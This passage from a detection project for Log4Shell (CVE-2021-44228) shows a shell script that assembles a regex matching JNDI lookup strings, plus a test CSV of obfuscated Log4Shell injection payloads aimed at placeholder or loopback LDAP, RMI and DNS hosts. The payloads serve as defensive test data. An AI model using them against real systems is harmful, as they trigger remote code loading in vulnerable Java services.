| nis="${n}${sp}${i}${sp}${s}" 34 | iiop="(?:${sp}${i}){2}${sp}${o}${sp}${p}" 35 | corba="${c}${sp}${o}${sp}${r}${sp}${b}${sp}${a}" 36 | nds="${n}${sp}${d}${sp}${s}" 37 | https="${h}(?:${sp}${t}){2}${sp}${p}(?:${sp}${s})?" 38 | 39 | # Target RegEx 40 | # ${jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http): 41 | 42 | protocols="(${ldaps}|${rmi}|${dns}|${nis}|${iiop}|${corba}|${nds}|${https})" 43 | 44 | b64_enc='(JH[s-v]|[\x2b\x2f-9A-Za-z][CSiy]R7|[\x2b\x2f-9A-Za-z]{2}[048AEIMQUYcgkosw]ke[\x2b\x2f-9w-z])' 45 | b64="${b}${sp}${a}${sp}${s}${sp}${e}${sp}${colon}${b64_enc}" 46 | 47 | plain="${jndi}${sp}${colon}${sp}${protocols}${sp}${colon}" 48 | 49 | Log4ShellRex="(?im)(?:^|[\n]).*?${dollar}${curly_open}${sp}(${plain}|${b64})" 50 | 51 | echo "Log4ShellRex='${Log4ShellRex}'" 52 | -------------------------------------------------------------------------------- /screenshots/example_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/back2root/log4shell-rex/54de449903e274a9f47573dedcfe832cc50a04b5/screenshots/example_1.png -------------------------------------------------------------------------------- /screenshots/example_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/back2root/log4shell-rex/54de449903e274a9f47573dedcfe832cc50a04b5/screenshots/example_2.png -------------------------------------------------------------------------------- /screenshots/example_3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/back2root/log4shell-rex/54de449903e274a9f47573dedcfe832cc50a04b5/screenshots/example_3.png -------------------------------------------------------------------------------- /screenshots/example_4a.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/back2root/log4shell-rex/54de449903e274a9f47573dedcfe832cc50a04b5/screenshots/example_4a.png -------------------------------------------------------------------------------- /screenshots/example_4b.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/back2root/log4shell-rex/54de449903e274a9f47573dedcfe832cc50a04b5/screenshots/example_4b.png -------------------------------------------------------------------------------- /screenshots/example_4c.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/back2root/log4shell-rex/54de449903e274a9f47573dedcfe832cc50a04b5/screenshots/example_4c.jpeg -------------------------------------------------------------------------------- /screenshots/viz_4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/back2root/log4shell-rex/54de449903e274a9f47573dedcfe832cc50a04b5/screenshots/viz_4.png -------------------------------------------------------------------------------- /testdata/cve-2021-44228.csv: -------------------------------------------------------------------------------- 1 | _raw 2 | \044%7B\\44{env:NOTHING:-j}\u0024{lower:N}\\u0024{lower:${upper:d}}}i:dns:/addr} 3 | ${${::-j}nd${upper:ı}:rm${upper:ı}://addr} 4 | ${${base64:JHtqbmRpOmxkYXA6YWRkcn0=}} 5 | ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//addr} 6 | ${jndi:${lower:l}${lower:d}a${lower:p}://$a{upper:d}dr} 7 | ${jndi:${lower:l}${lower:d}a${lower:p}://addr 8 | ${jndi:dns://addr} 9 | ${jndi:dns:${jndi:pwd}${jndi:pwd}addr} 10 | %24%7B%6a%6e%64%24%7B%75%70%70%65%72%3a%C4%B1%7D%3a%6c%64%61%70%3a%2f%2f 11 | %2524%257B%256a%256e%2564%2524%257B%2575%2570%2570%2565%2572%253a%25C4%25B1%257D%253a%256c%2564%2561%2570%253a%252f%252f%0A 12 | "YYYY-MM-DD prefix1 13 | prefix2 ${jndi:dns://addr} suffix" 14 | ${jndi:ldap://127.0.0.1:1099/obj} 15 | ${${upper:j}n${lower:d}${lower:i}:l${lower:d}${lower:a}${lower:p}${lower::}${lower:/}${lower:/}1${lower:2}${lower:7}.0${lower:.}0${lower:.}${lower:1}${lower::}10${lower:9}9${lower:/}o${lower:b}j} 16 | ${${upper:j}${lower:n}${lower:d}${lower:i}${lower::}${lower:l}${lower:d}${lower:a}${lower:p}${lower::}${lower:/}${lower:/}${lower:1}${lower:2}${lower:7}${lower:.}${lower:0}${lower:.}${lower:0}${lower:.}${lower:1}${lower::}${lower:1}${lower:0}${lower:9}${lower:9}${lower:/}${lower:o}${lower:b}${lower:j}} 17 | ${jndi:ld${ozI:Kgh:Qn:TXM:-a}p:${DBEau:Y:pLXUu:SfRKk:vWu:-/}${x:UMADq:-/}127${lt:tWd:iEVW:pD:tGCr:-.}${jFpSDW:z:SN:AuqM:C:-0}${dxxilc:HTFa:QLgii:pv:-.}0.${a:l:urnrtk:-1}:1099${zlSEqQ:T:qg:o:-/}ob${E:yJDsbq:-j}} 18 | ${${eh:wDUdos:jKY:-j}${xksV:Xgi:-n}${hNdb:SbmXU:goWgvJ:iqAV:Ux:-d}${MXWN:oOi:c:UxXzcI:-i}${DYKgs:tHlY:-:}${d:FHdMm:fw:-l}${Gw:-d}${LebGxe:c:SxLXa:-a}${echyWc:BE:NBO:s:gVbT:-p}${l:QwCL:gzOQm:gqsDS:-:}${qMztLn:e:E:WS:-/}${NUu:S:afVNbT:kyjbiE:-/}${PtGUfI:WcYh:c:-1}${YoSJ:KUV:uySK:crNTm:-2}${EwkY:EsX:S:wk:-7}${HUWOJ:MMIxOn:S:-.}${MHF:s:-0}${obrJVU:RPw:d:A:-.}${E:RgY:j:-0}${MaOtbM:-.}${O:-1}${zzfuGD:YEyvy:mhp:T:-:}${vlaw:WuOBz:-1}${HAjxt:ziBgmc:-0}${UKVBrk:sNAKe:F:qXNetQ:mdIuOW:-9}${geJs:sgYgQW:oOd:qOGf:aYpAkP:-9}${UonINv:-/}${aTygHK:pbQiTB:KkXhKS:-o}${FMRAKM:-b}${wiu:vKIVuh:-j}} 19 | --------------------------------------------------------------------------------